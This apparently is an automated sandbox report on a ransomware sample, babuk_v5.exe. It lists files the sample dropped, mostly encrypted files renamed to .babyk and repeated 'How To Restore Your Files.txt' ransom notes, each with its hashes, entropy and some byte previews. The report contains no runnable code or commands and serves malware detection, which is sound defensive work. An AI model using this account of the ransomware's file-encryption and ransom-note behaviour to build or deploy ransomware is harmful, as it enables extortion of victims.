                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):24744
                                                                            Entropy (8bit):7.99270359538762
                                                                            Encrypted:true
                                                                            SSDEEP:768:rZQoYyBMPvd8FEvnIQzVpsp5XOP/5IsDeJ097Ww:Z/CPVVvTzVAXKh/eu7Ww
                                                                            MD5:245F97A15A31A71FE51F572C58E371A2
                                                                            SHA1:27578FA3EFBEE6709F0449A528980A2D5D3675B1
                                                                            SHA-256:392991AD4C1349E09DC9398AA7174A2E47DE6B5A730033E0E3D5F4F64B2F7A3E
                                                                            SHA-512:B3BB59FAED083D1719D3B85A39046D08EA4EC541ECADF19C8A41FAD1D253709D4567ED6356EA7A5A977FEEC0EE6CF52F29B63DBFCE7CAA8DA2C1BB364CD78E80
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\TransportIdList.setting.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):173
                                                                            Entropy (8bit):6.521014860883482
                                                                            Encrypted:false
                                                                            SSDEEP:3:Xu/g9z8m1rauzxiTKG7rbm7q4UJxha4qFrX+hRJqllc9UxNvEEn:e+z8WTIJrsq4UJxhaxrX+HJeO90vtn
                                                                            MD5:F6581708AA801EFEAF0C02BA5B1C331A
                                                                            SHA1:34128D410E79DF8A11A6E47A81E2FA0488A627B0
                                                                            SHA-256:4C564C04CA8432FD90AD96E3A0783353FF92D19A84D8C6885D18172550707C51
                                                                            SHA-512:D9C2D74B07A5F77C6AB2239C30971A6240ED17AD8CAE889F46DEC952A27C1F71D9BE36DE6453680FD0F6D4A4F3053CA73265D1BCD91F963E95C3221009DAC3B9
                                                                            Malicious:false
                                                                            Preview: .#.2......u..T..S?ty../......f..../...(...@.6-.{.....ofIs..p.p.ad~....[.....~..........@....l.TJ{.....X....0....`o..A.k...y.i>..t..:......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.574916752942751
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlvM2dyaHlKv+wbpNucbV3EcVDUFjmokLRsLI9QSXXgvBQLUxNvEEn:d/k3bVUcVwZm51j9DXXgaL0vtn
                                                                            MD5:3D4C52DF0D7A4FD9E7182C0C6BA18C77
                                                                            SHA1:5A30A6DB7AF2D2F321AD0CE0B88A03E728916715
                                                                            SHA-256:6BFD6C18E3AA2538222DFF5137F266D94B9E1F8720934FAD5018C8B38A43B0CF
                                                                            SHA-512:6E3A69E39D411D665B34015DBC5FB0F9FF14DFB3C78CBCDDE54CBD3F93003071812F5D5C8E45BA204B8CCD97349E23EE13307A967B3ADEF28AB422628BB092F0
                                                                            Malicious:false
                                                                            Preview: ......8k.....7....|M0..sD.O"....a..PB...f~L...^./.....B7......gb.+GA....[ ...1.$..W...}<Q.]...8m....H....8.mm..d_!].p......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980361298814639
                                                                            Encrypted:false
                                                                            SSDEEP:192:hzVkxCxe1FrjPMFEqo62boiIR0G1guOIqS5QEGtAS:hzOExevUa/IRRes5pGtAS
                                                                            MD5:1D271A929975BC1C147CDD34F99CBFDB
                                                                            SHA1:1F5A96D4DB0B8DE5D486445882DCE1B8084D6C9F
                                                                            SHA-256:943D39502D54A50BB9F0CCFC875F40A65CC86494983063743B5F2F19CB1DDE21
                                                                            SHA-512:D7CA75DC6AA38BB0CC9C7D2C41B5189675B057B4534EB38BFFACA1A977C0598D15AB06BFBB4F12827C234BFE74A9EE88C7A2EFDAE08A7B0885712EDB09FD77DC
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.515281298218571
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlM8Xa1skyEvpTmEaOzmQVvRVsFcY6ZORpa406ch9jxlnIvJeuNb890T/l0UxNvt:mF/9mtEzjKFzSjxlcjNb8s+0vtn
                                                                            MD5:5D7396F8A5A9DEF194C1453921C8735D
                                                                            SHA1:0EE147276EDC173D35E606047A433258D0ED7446
                                                                            SHA-256:2E095DB317714C7ABBE07711170BCBB4EC745BC1A8FF48F76BE5350A654ADB10
                                                                            SHA-512:E837340C710FAA18193F0FC044206E64E762FACDA26C924BC0190624AD2D2BE29B4605C5F0191DD4069CF5B8A3C4C4B835008780E887ED6B32DBFB80B3417356
                                                                            Malicious:false
                                                                            Preview: .....Ai..n.L2.........w.V.6.....i......R.......k+h.J..u* <..]...r..v.....z..<........p...c.....@......S.[......S....7.... ....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.98022836073581
                                                                            Encrypted:false
                                                                            SSDEEP:192:Gq0y5rTbrHFQz3+VqNPc66s24enBHWCYKuemb/JYZiqjrB9OGhi:iy1HHSz+VqdcVs24SFXuTh5qla
                                                                            MD5:04A031C5D232E63C43322D8325155524
                                                                            SHA1:51561155C83D27FB9FB85853D89D23699FEE94E8
                                                                            SHA-256:BBD754EC72304F63A6A0CB6F489B9B6CF88BD0ABC9DAC7003A364D772DF6235D
                                                                            SHA-512:8B018B0CE25DB97D835BB26A46053118D50FD502D5B49906E3D6A97C1932BE37B63F684213502A1FC5E0CE4A30E8CF154E3FAD83E5E81C8AE7F9B49662B6AC37
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.673210280216431
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlXu44vLLXCOW25g90U9b7aG8fewO+ya2yDJv782I09UxNvEEn:nu44vLjCH25gVZZ8fef+yazJjxr90vtn
                                                                            MD5:FD0C0ED8B8D1591AE20B331170AF57AD
                                                                            SHA1:C075778CD919944147B57D2D5DDF439E4C95EAB7
                                                                            SHA-256:C9B849EF52B48509504C55AB3ABF2F01AB2AA0945E3F5F13E4A565C0E98AC054
                                                                            SHA-512:9F198EF7434B0BBD0A417433B0296FFDB6BEF1A6D6B6578F2D339E1A2EDDBDD47161A87DB10E498033D977BDE8312BABED2D91C7B5619E12CEFD94632A6F86D7
                                                                            Malicious:false
                                                                            Preview: .....r.lE.:]..L........%.!.v..z....7....`.W......`.`.Q{..{-.X...%.8..6R.-....3^...)T......Y7U4..[-F...w.c&..>ZO.h?.G....Z.....X$....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980059201619717
                                                                            Encrypted:false
                                                                            SSDEEP:192:wOcraisRinPPr8QSMJUzNlokkR51F+858SOSZ2AVAMMPa1XGHQbC:wOLisRsr0zjk1FjVOoOPZwbC
                                                                            MD5:5AB5C5AEE9C547050449BA4FF67D91B9
                                                                            SHA1:AE12A802A46A285BB5601E9F12C3DB0594840BA0
                                                                            SHA-256:94A6EFD711902C6C8D613CD05F61F8413A7947AD80D904FBBDE18661779A025C
                                                                            SHA-512:2A906B3F80409FD674D4D247491DD6004F2FD991ACDCFE09A438A727628E8E824BE1F0730FC1685007A03FC3C3B7FBBDFDEDFF5C17F3680A7E66B7068641C8C4
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
